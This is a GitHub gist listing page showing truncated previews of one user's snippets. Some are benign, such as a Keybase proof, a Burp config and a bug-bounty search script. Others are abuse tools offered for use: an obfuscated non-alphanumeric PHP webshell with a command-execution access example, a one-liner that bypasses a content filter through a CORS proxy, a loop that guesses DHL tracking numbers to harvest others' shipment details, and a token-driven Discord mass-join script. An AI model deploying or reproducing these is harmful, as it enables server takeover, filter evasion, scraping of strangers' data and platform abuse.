Skip to content

Instantly share code, notes, and snippets.

View vsec7's full-sized avatar

Viloid vsec7

253 followers · 13 following
View GitHub Profile
@vsec7
vsec7 / keybase.md
Created September 12, 2019 11:56

Keybase proof

I hereby claim:

  • I am vsec7 on github.
  • I am cans21 (https://keybase.io/cans21) on keybase.
  • I have a public key ASCCatheOxs0VJHn9jgLFpmtgYImVJ1DW1GE86i92FglhAo

To claim this, I am signing this object:

@vsec7
vsec7 / instagram_auth.sh
Created January 7, 2020 17:18
#!/usr/bin/env bash
# by : sec7or
base="https://www.instagram.com"
ua="Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
# login $user $pass
login(){
csrf=$(curl -Is "$base/accounts/login/" | grep -oP 'csrftoken=\K[^;]+')
curl -s -c "cookie.txt" "$base/accounts/login/ajax/" \
@vsec7
vsec7 / bblist.sh
Created May 18, 2020 13:27
#!/usr/bin/env bash
# Search Program Bug Bounty
# By Viloid
# ./bblist.sh <search>
get=$(curl -s "https://raw.githubusercontent.com/disclose/disclose/master/program-list/program-list.json" | jq '.[]|select(.program_name|test("'$1'"; "i"))' | jq -s '[.[]]')
echo $get | jq
@vsec7
vsec7 / nhentai.sh
Created June 14, 2020 04:47
[OneLiner] [bash] Bypass internet positive + mass image downloader nhentai.net
read -p "ID : " id;mkdir $id;cd $_;xargs -n1 -I{} sh -c 'curl --progress-bar -O -H "Origin: rincans.io" "https://cors-anywhere.herokuapp.com/{}"' <<< `curl -s -H "Origin: rincans.io" "https://cors-anywhere.herokuapp.com/https://nhentai.net/g/$id/" | grep -Po 'data-src="\K[^"]+' | grep -v thumb`
@vsec7
vsec7 / BurpSuiteSSLPassTrough.json
Created June 25, 2020 11:43
Filter out the noise
{
"proxy":{
"ssl_pass_through":{
"automatically_add_entries_on_client_ssl_negotiation_failure":false,
"rules":[
{
"enabled":true,
"host":".*\\.google\\.com",
"protocol":"any"
},
@vsec7
vsec7 / Non-Alphanumeric_WebShell.md
Created July 27, 2020 11:54
Non-Alphanumeric WebShell PHP explaination

Non-Alphanumeric WebShell PHP

Code :

<?php $_='{';$_=($_^'<').($_^'>;').($_^'/');${'_'.$_}['_'](${'_'.$_}['__']);

Cara Akses :

shell.php?_=system&__=id
@vsec7
vsec7 / WAHH_Task_Checklist.md
Created September 5, 2020 03:06 — forked from jhaddix/Testing_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
@vsec7
vsec7 / Bookmarklet_FB_downloader_via_chrome_android.md
Created October 18, 2020 14:10
Download video Facebook via Chrome Android

Download video Facebook via Chrome Android

    1. visit link facebook video
    1. copy paste this payload on url bar
javascript:window.open(document.body.innerHTML.match(/(?<=video:\[\{url:").*?(?=")/),'_blank');

*NB :

@vsec7
vsec7 / gen_dhl_awb.sh
Created April 7, 2021 04:39
Generate random awb DHL (delivered only)
echo;while :;do d=10;a=$(date +%s);b=$((a*RANDOM));while [ ${#b} -lt 10 ]; do b="${b}$RANDOM";done;g=$(curl -s "https://mydhl.express.dhl/shipmentTracking?AWB=$(echo "${b:0:d}")&countryCode=id&languageCode=en" | jq .results[0]); if [ $(echo $g | jq -r .delivery.status) == "delivered" ]; then printf "%s | %s| ori: %s | dest: %s\n" "$(echo $g | jq -r .id)" "$(echo $g | jq -r .checkpoints[0].date)" "$(echo $g | jq -r .origin.value)" "$(echo $g | jq -r .destination.value)" | tee -a dhlawb.txt;fi;done
@vsec7
vsec7 / invite.sh
Last active April 13, 2022 22:30
Mass join discord server
#!/usr/bin/env bash
# DC mass join server
# Created by github.com/vsec7
# Usage : ./script
join(){
g=$(curl -s -X POST "https://discordapp.com/api/v6/invites/$1" \
-H "Authorization: $2")
if [ $(echo $g | grep -oP '"new_member": \K[^,]+' ) == "true" ]; then
echo "[+] $2 : Succesfully joined"